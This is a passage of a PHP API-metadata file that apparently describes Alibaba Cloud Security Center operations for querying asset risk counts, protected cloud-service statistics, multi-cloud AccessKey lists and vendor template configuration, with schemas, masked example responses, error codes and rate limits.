events'."\n" .'- **cveNum**: the number of Linux vulnerabilities'."\n" .'- **emgNum**: the number of emergency vulnerabilities'."\n" .'- **health**: the number of unhandled baseline alerting events'."\n" .'- **imageBaselineHigh**: the number of high-risk image baseline risks'."\n" .'- **imageBaselineLow**: the number of low-risk image baseline risks'."\n" .'- **imageBaselineMedium**: the number of medium-risk image baseline risks'."\n" .'- **imageBaselineNum**: the total number of image baseline risks'."\n" .'- **imageMaliciousFileRemind**: the number of image reminder-level malicious files'."\n" .'- **imageMaliciousFileSerious**: the number of image critical-level malicious files'."\n" .'- **imageMaliciousFileSuspicious**: the number of image suspicious-level malicious files'."\n" .'- **imageVulAsap**: the number of high-priority image vulnerabilities'."\n" .'- **imageVulLater**: the number of medium-priority image vulnerabilities'."\n" .'- **imageVulNntf**: the number of low-priority image vulnerabilities'."\n" .'- **laterVulCount**: the number of medium-priority vulnerabilities'."\n" .'- **newSuspicious**: the number of alerting events'."\n" .'- **nntfVulCount**: the number of low-priority vulnerabilities'."\n" .'- **remindNum**: the number of reminder alerting events'."\n" .'- **scaNum**: the number of software composition analysis vulnerabilities'."\n" .'- **seriousNum**: the number of critical alerting events'."\n" .'- **suspNum**: the number of suspicious alerting events'."\n" .'- **suspicious**: the total number of alerting events'."\n" .'- **sysNum**: the number of Windows vulnerabilities'."\n" .'- **trojan**: the number of trojans'."\n" .'- **uuid**: the UUID of the asset'."\n" .'- **vul**: the number of vulnerabilities'."\n" .'- **weakPWNum**: the number of weak passwords', 'type' => 'string', 'example' => '{'."\n" .' "account": 0,'."\n" .' "appNum": 0,'."\n" .' "asapVulCount": 0,'."\n" .' "baselineHigh": 0,'."\n" .' "baselineLow": 0,'."\n" .' "baselineMedium": 0,'."\n" .' "baselineNum": 0,'."\n" .' "cmsNum": 0,'."\n" .' "containerAsap": 0,'."\n" .' "containerLater": 0,'."\n" .' "containerNntf": 0,'."\n" .' "containerRemind": 0,'."\n" .' "containerSerious": 0,'."\n" .' "containerSuspicious": 0,'."\n" .' "cveNum": 0,'."\n" .' "emgNum": 0,'."\n" .' "health": 0,'."\n" .' "imageBaselineHigh": 0,'."\n" .' "imageBaselineLow": 0,'."\n" .' "imageBaselineMedium": 0,'."\n" .' "imageBaselineNum": 0,'."\n" .' "imageMaliciousFileRemind": 0,'."\n" .' "imageMaliciousFileSerious": 0,'."\n" .' "imageMaliciousFileSuspicious": 0,'."\n" .' "imageVulAsap": 0,'."\n" .' "imageVulLater": 0,'."\n" .' "imageVulNntf": 0,'."\n" .' "laterVulCount": 0,'."\n" .' "newSuspicious": 0,'."\n" .' "nntfVulCount": 0,'."\n" .' "remindNum": 0,'."\n" .' "scaNum": 0,'."\n" .' "seriousNum": 0,'."\n" .' "suspNum": 0,'."\n" .' "suspicious": 0,'."\n" .' "sysNum": 0,'."\n" .' "trojan": 0,'."\n" .' "uuid": "inet-37316411-37fe-4b72-b245-346a2721****",'."\n" .' "vul": 0,'."\n" .' "weakPWNum": 0'."\n" .'}', 'title' => ''], 'IpListString' => ['description' => 'The IP address list of the system.', 'type' => 'string', 'example' => '172.31.XX.XX,172.171.XX.XX', 'title' => ''], 'AssetTypeName' => ['description' => 'The name of the asset type.', 'type' => 'string', 'example' => 'Elastic Compute Service', 'title' => ''], 'FlagName' => ['description' => 'The asset vendor. Valid values:'."\n" .'- **ALIYUN**'."\n" .'- **OUT**'."\n" .'- **IDC**'."\n" .'- **Tencent**'."\n" .'- **HUAWEICLOUD**'."\n" .'- **Azure**'."\n" .'- **AWS**'."\n" .'- **ASK**'."\n" .'- **TRIPARTITE**'."\n" .'- **SAE**'."\n" .'- **PAI**'."\n" .'- **google**'."\n" .'- **VOLCENGINE**', 'type' => 'string', 'example' => 'ASK', 'title' => ''], 'AppId' => ['description' => 'The application ID.'."\n" .'> This field is returned only when **Vendor** is set to 9.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'AppName' => ['description' => 'The application name.'."\n" .'> This field is returned only when **Vendor** is set to 9.', 'type' => 'string', 'example' => 'testAppName', 'title' => ''], 'ClientSubStatus' => ['description' => 'The sub-status of the client on the instance. Valid values:'."\n" ."\n" .'- **online**: Online. The Agent client status is **Enabled**.'."\n" .'- **offline**: Offline. The Agent client status is **Disabled**.'."\n" .'- **pause**: Paused. The Agent client status is **Protection Paused**.'."\n" .'- **uninstalled**: Not installed. The Agent client is **Not Installed**.'."\n" .'- **stopped**: Server shut down. The Agent client status is **Server Shut Down**.', 'type' => 'string', 'example' => 'online', 'title' => ''], 'TagResources' => ['description' => 'The custom tags of the Lingjun AI Computing Service node. This field is returned only when the server is a Lingjun AI Computing Service server.', 'type' => 'string', 'example' => 'app:test,type:lingjun', 'title' => ''], 'PostPaidFlag' => ['description' => 'The billable methods of the protection edition bound to the asset. Valid values:'."\n" .'- **0**: subscription'."\n" .'- **1**: pay-as-you-go', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'HasContainer' => ['description' => 'Indicates whether the asset contains containers. Valid values:'."\n" ."\n" .'- **YES**: Contains containers.'."\n" .'- **NO**: Does not contain containers.', 'type' => 'string', 'example' => 'YES', 'title' => ''], 'ServiceId' => ['description' => 'The service ID. This field has a value only when the instance is a serverless instance that belongs to the PAI platform.', 'type' => 'string', 'example' => 'dsw-76jlywunsif09bp15p', 'title' => ''], 'VendorUid' => ['title' => '', 'description' => 'The account ID of the multi-cloud instance.', 'type' => 'string', 'example' => '123'], 'VendorUserName' => ['title' => '', 'description' => 'The account name of the multi-cloud instance.', 'type' => 'string', 'example' => 'VendorUserName'], 'Namespace' => ['description' => 'The namespace.', 'type' => 'string', 'example' => 'crm-test', 'title' => ''], 'BindFileProtectType' => ['title' => '', 'description' => 'Indicates whether tamper-proofing authorization is bound. Valid values:'."\n" ."\n" .'- **block**: Bound.'."\n" .'- **none**: Not bound.', 'type' => 'string', 'example' => 'block'], 'EdrAuthVersion' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'title' => 'Query asset information', 'description' => 'You can search for assets by instance ID, instance name, VPC ID, region, public IP address, and other conditions. You can also set logical relationships between different search conditions to search for assets that match multiple criteria.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCloudCenterInstances'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"RequestId\\": \\"32A73759-4C0F-4801-BE98-901223ACEE9A\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 50,\\n \\"Count\\": 10,\\n \\"NextToken\\": \\"B604532DEF982B875E8360A6EFA3B***\\"\\n },\\n \\"Instances\\": [\\n {\\n \\"Status\\": \\"Running\\",\\n \\"CpuInfo\\": \\"Intel(R) Xeon(R) Platinum 8269CY CPU @ 2.50GHz\\",\\n \\"InternetIp\\": \\"1.2.XX.XX\\",\\n \\"Kernel\\": \\"3.10.0-1127.19.1.el7.x86_64\\",\\n \\"Bind\\": true,\\n \\"OsName\\": \\"-\\",\\n \\"Tag\\": \\"InternetIp,test\\",\\n \\"ClientStatus\\": \\"online\\",\\n \\"Mem\\": 1024,\\n \\"VpcInstanceId\\": \\"vpc-uf60agqq65bs98zoo****\\",\\n \\"TagId\\": \\"121313,41412\\",\\n \\"Flag\\": 0,\\n \\"LastLoginTimestamp\\": 1637592907000,\\n \\"AuthVersion\\": 1,\\n \\"Region\\": \\"cn-hangzhou-cm***-***\\",\\n \\"InstanceName\\": \\"yztest-l***\\",\\n \\"PodCount\\": 1,\\n \\"VulCount\\": 2,\\n \\"HcStatus\\": \\"YES\\",\\n \\"CreatedTime\\": 1607365213000,\\n \\"GroupTrace\\": \\"default\\",\\n \\"ClusterId\\": \\"c690a0789419f4284a4e0a29e12fe****\\",\\n \\"RiskStatus\\": \\"NO\\",\\n \\"Cores\\": 4,\\n \\"VulStatus\\": \\"YES\\",\\n \\"AlarmStatus\\": \\"NO\\",\\n \\"MacListString\\": \\"00:13:3e:31:13:39,02:12:67:b8:**:**\\",\\n \\"Importance\\": 2,\\n \\"HealthCheckCount\\": 1,\\n \\"Ip\\": \\"1.2.XX.XX\\",\\n \\"Os\\": \\"Linux\\",\\n \\"AuthModifyTime\\": 1627974044000,\\n \\"SafeEventCount\\": 5,\\n \\"InstanceId\\": \\"i-m5***\\",\\n \\"AssetType\\": \\"0\\",\\n \\"IntranetIp\\": \\"1.2.XX.XX\\",\\n \\"Vendor\\": 0,\\n \\"RegionId\\": \\"cn-hanghzou\\",\\n \\"Uuid\\": \\"c9107c04-942f-40c1-981a-f1c1***\\",\\n \\"GroupId\\": 4120080,\\n \\"RegionName\\": \\"China (Hangzhou)\\",\\n \\"VendorName\\": \\"IDC\\",\\n \\"AuthVersionName\\": \\"Ultimate Edition\\",\\n \\"ClusterName\\": \\"cluster1\\",\\n \\"ExposedStatus\\": 0,\\n \\"RiskCount\\": \\"{\\\\n \\\\\\"account\\\\\\": 0,\\\\n \\\\\\"appNum\\\\\\": 0,\\\\n \\\\\\"asapVulCount\\\\\\": 0,\\\\n \\\\\\"baselineHigh\\\\\\": 0,\\\\n \\\\\\"baselineLow\\\\\\": 0,\\\\n \\\\\\"baselineMedium\\\\\\": 0,\\\\n \\\\\\"baselineNum\\\\\\": 0,\\\\n \\\\\\"cmsNum\\\\\\": 0,\\\\n \\\\\\"containerAsap\\\\\\": 0,\\\\n \\\\\\"containerLater\\\\\\": 0,\\\\n \\\\\\"containerNntf\\\\\\": 0,\\\\n \\\\\\"containerRemind\\\\\\": 0,\\\\n \\\\\\"containerSerious\\\\\\": 0,\\\\n \\\\\\"containerSuspicious\\\\\\": 0,\\\\n \\\\\\"cveNum\\\\\\": 0,\\\\n \\\\\\"emgNum\\\\\\": 0,\\\\n \\\\\\"health\\\\\\": 0,\\\\n \\\\\\"imageBaselineHigh\\\\\\": 0,\\\\n \\\\\\"imageBaselineLow\\\\\\": 0,\\\\n \\\\\\"imageBaselineMedium\\\\\\": 0,\\\\n \\\\\\"imageBaselineNum\\\\\\": 0,\\\\n \\\\\\"imageMaliciousFileRemind\\\\\\": 0,\\\\n \\\\\\"imageMaliciousFileSerious\\\\\\": 0,\\\\n \\\\\\"imageMaliciousFileSuspicious\\\\\\": 0,\\\\n \\\\\\"imageVulAsap\\\\\\": 0,\\\\n \\\\\\"imageVulLater\\\\\\": 0,\\\\n \\\\\\"imageVulNntf\\\\\\": 0,\\\\n \\\\\\"laterVulCount\\\\\\": 0,\\\\n \\\\\\"newSuspicious\\\\\\": 0,\\\\n \\\\\\"nntfVulCount\\\\\\": 0,\\\\n \\\\\\"remindNum\\\\\\": 0,\\\\n \\\\\\"scaNum\\\\\\": 0,\\\\n \\\\\\"seriousNum\\\\\\": 0,\\\\n \\\\\\"suspNum\\\\\\": 0,\\\\n \\\\\\"suspicious\\\\\\": 0,\\\\n \\\\\\"sysNum\\\\\\": 0,\\\\n \\\\\\"trojan\\\\\\": 0,\\\\n \\\\\\"uuid\\\\\\": \\\\\\"inet-37316411-37fe-4b72-b245-346a2721****\\\\\\",\\\\n \\\\\\"vul\\\\\\": 0,\\\\n \\\\\\"weakPWNum\\\\\\": 0\\\\n}\\",\\n \\"IpListString\\": \\"172.31.XX.XX,172.171.XX.XX\\",\\n \\"AssetTypeName\\": \\"Elastic Compute Service\\",\\n \\"FlagName\\": \\"ASK\\",\\n \\"AppId\\": \\"test\\",\\n \\"AppName\\": \\"testAppName\\",\\n \\"ClientSubStatus\\": \\"online\\",\\n \\"TagResources\\": \\"app:test,type:lingjun\\",\\n \\"PostPaidFlag\\": 0,\\n \\"HasContainer\\": \\"YES\\",\\n \\"ServiceId\\": \\"dsw-76jlywunsif09bp15p\\",\\n \\"VendorUid\\": \\"123\\",\\n \\"VendorUserName\\": \\"VendorUserName\\",\\n \\"Namespace\\": \\"crm-test\\",\\n \\"BindFileProtectType\\": \\"block\\",\\n \\"EdrAuthVersion\\": \\"\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeCloudProductFieldStatistics' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => true, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92022', 'abilityTreeNodes' => ['FEATUREsasLFD8D4'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'GroupedFields' => [ 'description' => 'The statistics of cloud services that are protected by Security Center.'."\n", 'type' => 'object', 'properties' => [ 'CategoryCount' => ['description' => 'The statistics of different types of assets. **MachineType** indicates the type of the asset. **Count** indicates the number of assets of a specific type.'."\n" ."\n" .'Valid values of **MachineType**:'."\n" ."\n" .'* **1**: Server Load Balancer (SLB) instance'."\n" .'* **2**: NAT gateway instance'."\n" .'* **3**: ApsaraDB RDS instance'."\n" .'* **4**: ApsaraDB for MongoDB instance'."\n", 'type' => 'string', 'example' => '[{"MachineType":1,"Count":11}]', 'title' => ''], 'InstanceCount' => ['description' => 'The total number of cloud services that are protected by Security Center.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'RiskInstanceCount' => ['description' => 'The number of cloud services that are at risk.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '90', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => [ 'substitutions' => ['Sas::2018-12-03::GetCloudAssetSummary'], ], 'title' => 'DescribeCloudProductFieldStatistics', 'summary' => 'Queries the statistics of cloud services whose instances are protected by Security Center.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCloudProductFieldStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCloudProductFieldStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"GroupedFields\\": {\\n \\"CategoryCount\\": \\"[{\\\\\\"MachineType\\\\\\":1,\\\\\\"Count\\\\\\":11}]\\",\\n \\"InstanceCount\\": 100,\\n \\"RiskInstanceCount\\": 90\\n }\\n}","errorExample":""},{"type":"xml","example":"\\n A2305077-05D4-4B77-9FEB-E7AB98DC2EF3\\n \\n 23\\n \\n 7\\n 1\\n \\n \\n 15\\n 2\\n \\n \\n 1\\n 3\\n \\n 1\\n \\n","errorExample":""}]', ], 'DescribeCloudVendorAccountAKList' => [ 'summary' => 'Queries the multi-cloud assets added to Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92023', 'abilityTreeNodes' => ['FEATUREsas36IOGX', 'FEATUREsasLFD8D4'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Default value: 20.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number. Default value: 1.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'SubAccountName', 'in' => 'query', 'schema' => ['description' => 'The username of the sub-account of the cloud service provider to which the AccessKey pair belongs.'."\n", 'type' => 'string', 'required' => false, 'example' => 'AlibabaCloud_***', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the AccessKey pair. Valid values:'."\n" ."\n" .'* **0**: enabled'."\n" .'* **1**: disabled'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'AuthIds', 'in' => 'query', 'schema' => ['description' => 'The unique ID of the AccessKey pair.'."\n", 'type' => 'string', 'required' => false, 'example' => '2624', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'VendorAuthAlias', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The name of the AccessKey pair.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'Cloud asset vendor. Values:'."\n" .' - **Tencent**: Tencent Cloud '."\n" .'- **AWS**: Amazon Web Services', 'type' => 'string', 'required' => false, 'example' => 'VOLCENGINE', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '1383B0DB-D5D6-4B0C-9E6B-75939C8****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '55', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'CloudVendorAccountAKs' => [ 'description' => 'The information about the AccessKey pairs.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the AccessKey pair. Valid values:'."\n" ."\n" .'* **0**: enabled'."\n" .'* **1**: disabled'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AuthId' => ['description' => 'The unique ID of the AccessKey pair.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '2345', 'title' => ''], 'AkType' => ['description' => 'The type of the account to which the AccessKey pair belongs. Valid values:'."\n" ."\n" .'* **primary**: a primary account'."\n" .'* **sub**: a sub-account'."\n", 'type' => 'string', 'example' => 'primary', 'title' => ''], 'SecretId' => ['description' => 'The AccessKey ID.'."\n", 'type' => 'string', 'example' => 'S3D6c4O***', 'title' => ''], 'ServiceStatus' => ['description' => 'The service status of the AccessKey pair. Valid values:'."\n" ."\n" .'* **0**: being used'."\n" .'* **1**: exception occurred'."\n" .'* **2**: being validated'."\n" .'* **3**: validation timed out'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Vendor' => ['description' => 'The cloud service provider. Valid values:'."\n" ."\n" .'* **Tencent**: Tencent Cloud'."\n" .'* **HUAWEICLOUD**: Huawei Cloud'."\n" .'* **Azure**: Microsoft Azure'."\n" .'* **AWS**: Amazon Web Services (AWS)'."\n", 'type' => 'string', 'example' => 'Tencent', 'title' => ''], 'Message' => ['description' => 'The error message of the AccessKey pair.'."\n", 'type' => 'string', 'example' => 'The IAM user is forbidden in the currently selected region'."\n", 'title' => ''], 'AuthModules' => [ 'description' => 'The modules that are associated with the AccessKey pair.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'ModuleDisp' => ['description' => 'The display name of the module.'."\n", 'type' => 'string', 'example' => 'Host Assets', 'title' => ''], 'ModuleStatement' => ['description' => 'The permission description of the module.'."\n", 'type' => 'string', 'example' => 'Read permission of the cloud server or virtual machine', 'title' => ''], 'Module' => ['description' => 'The code of the module. Valid values:'."\n" ."\n" .'* **HOST**: host'."\n" .'* **CSPM**: configuration assessment'."\n" .'* **SIEM**: CloudSiem'."\n" .'* **TRIAL**: log audit'."\n", 'type' => 'string', 'example' => 'HOST', 'title' => ''], 'ModuleAssetType' => ['description' => 'The cloud asset that is associated with the module.'."\n", 'type' => 'string', 'example' => 'Cloud server or virtual machine', 'title' => ''], 'ModuleServiceStatus' => ['description' => 'The service status of the module. Valid values:'."\n" ."\n" .'* **0**: being used'."\n" .'* **1**: exception occurred'."\n" .'* **2**: being validated'."\n" .'* **3**: validation timed out'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Message' => ['description' => 'The error message of the module.'."\n", 'type' => 'string', 'example' => 'ak_domain_error', 'title' => ''], 'TrailStatus' => ['description' => 'The status of the log audit service. Valid values:'."\n" ."\n" .'* **init**: being initialized'."\n" .'* **verify**: being validated'."\n" .'* **enable**: enabled'."\n" .'* **disable**: disabled'."\n" .'* **error**: exception occurred'."\n" .'* **timeout**: validation timed out'."\n", 'type' => 'string', 'example' => 'enable', 'title' => ''], 'TrailMessage' => ['description' => 'The error message of the log audit service.'."\n", 'type' => 'string', 'example' => 'timeout', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'VendorAuthAlias' => ['description' => 'The name of the AccessKey pair.'."\n", 'type' => 'string', 'example' => 'test', 'title' => ''], 'CtdrCloudUserId' => ['description' => 'The Account ID.', 'type' => 'string', 'example' => 'azure_demo_1', 'title' => ''], 'ExtendInfo' => ['description' => 'The extended information of the module.', 'type' => 'string', 'example' => '{\\"product\\":\\"webFirewall\\",\\"remark\\":\\"remark\\"}', 'title' => ''], 'VendorUid' => ['description' => 'Account ID of the multi-cloud instance.', 'type' => 'string', 'example' => '123', 'title' => ''], 'VendorUserName' => ['description' => 'Account name of the multi-cloud instance.', 'type' => 'string', 'example' => 'VendorUserName', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeCloudVendorAccountAKList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCloudVendorAccountAKList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCloudVendorAccountAKList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1383B0DB-D5D6-4B0C-9E6B-75939C8****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 55,\\n \\"Count\\": 20\\n },\\n \\"CloudVendorAccountAKs\\": [\\n {\\n \\"Status\\": 0,\\n \\"AuthId\\": 2345,\\n \\"AkType\\": \\"primary\\",\\n \\"SecretId\\": \\"S3D6c4O***\\",\\n \\"ServiceStatus\\": 0,\\n \\"Vendor\\": \\"Tencent\\",\\n \\"Message\\": \\"The IAM user is forbidden in the currently selected region\\\\n\\",\\n \\"AuthModules\\": [\\n {\\n \\"ModuleDisp\\": \\"Host Assets\\",\\n \\"ModuleStatement\\": \\"Read permission of the cloud server or virtual machine\\",\\n \\"Module\\": \\"HOST\\",\\n \\"ModuleAssetType\\": \\"Cloud server or virtual machine\\",\\n \\"ModuleServiceStatus\\": 0,\\n \\"Message\\": \\"ak_domain_error\\",\\n \\"TrailStatus\\": \\"enable\\",\\n \\"TrailMessage\\": \\"timeout\\"\\n }\\n ],\\n \\"VendorAuthAlias\\": \\"test\\",\\n \\"CtdrCloudUserId\\": \\"azure_demo_1\\",\\n \\"ExtendInfo\\": \\"{\\\\\\\\\\\\\\"product\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"webFirewall\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"remark\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"remark\\\\\\\\\\\\\\"}\\",\\n \\"VendorUid\\": \\"123\\",\\n \\"VendorUserName\\": \\"VendorUserName\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeCloudVendorProductTemplateConfig' => [ 'summary' => 'Get the cloud product access template for vendors', 'path' => '', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'Cloud asset vendor. Values:'."\n" .'- **CHAITIN**: Chaitin Technology'."\n" .'- **FORTINET**: Fortinet'."\n" .'- **THREATBOOK**: ThreatBook', 'type' => 'string', 'required' => false, 'example' => 'CHAITIN', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'Set the language type for request and response messages, default is **zh**. Values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English'."\n" ."\n\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Request return data.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of this call request, which is a unique identifier generated by Alibaba Cloud for this request, and can be used to troubleshoot and locate issues.', 'type' => 'string', 'example' => 'CD380235-A0B8-540D-A0D5-D6288446****'], 'Data' => ['description' => 'Template configuration. This parameter is a JSON structure that includes the following fields: - **vendors**: A collection of vendor template configuration information. - **vendorType**: Vendor code, **CHAITIN** takes the value **100**, **FORTINET** takes the value **101**, and **THREATBOOK** takes the value **102**. - **vendor**: Vendor. Takes the values **CHAITIN**, **FORTINET**, or **THREATBOOK**. - **displayName**: Display name. Takes the values **Chaitin**, **Fortinet**, or **Threatbook**. - **products**: A list of template configuration information. This parameter is a JSON structure that includes the following fields: - **product**: Product code. When **vendor** is **CHAITIN**, it takes the value **webFirewall**; when **vendor** is **FORTINET**, it takes the value **fortigate**; when **vendor** is **THREATBOOK**, it takes the value **threatIntelligence**. - **displayName**: Product display name. When **vendor** is **CHAITIN**, it takes the value **WAF**; when **vendor** is **FORTINET**, it takes the value **FortiGate Firewall**; when **vendor** is **THREATBOOK**, it takes the value **Threat Intelligence API**. - **description**: Link to the technical support document for the product. - **backendConfig**: A list of API field mapping rules. This parameter is a JSON structure that includes the following fields: - **apiParams**: API field mapping rules. This parameter is a Map structure where the key is the backend field mapping key. The value is a JSON structure that includes the following fields: - **field**: Property key. - **format**: Type of the property value, which can be **text** or **json**. - **fields**: Fields that need to be filled in the template. This parameter is a JSON structure that includes the following fields: - **displayName**: Field display name. - **editable**: Whether the field is editable. Takes the values **true** or **false**. **true** means editable, **false** means not editable. - **fieldType**: Type of the field value. Takes the values **text** or **password**. - **required**: Whether the field is required. Takes the values **true** or **false**. **true** means required, **false** means not required. - **fieldId**: Field key.', 'type' => 'string', 'example' => 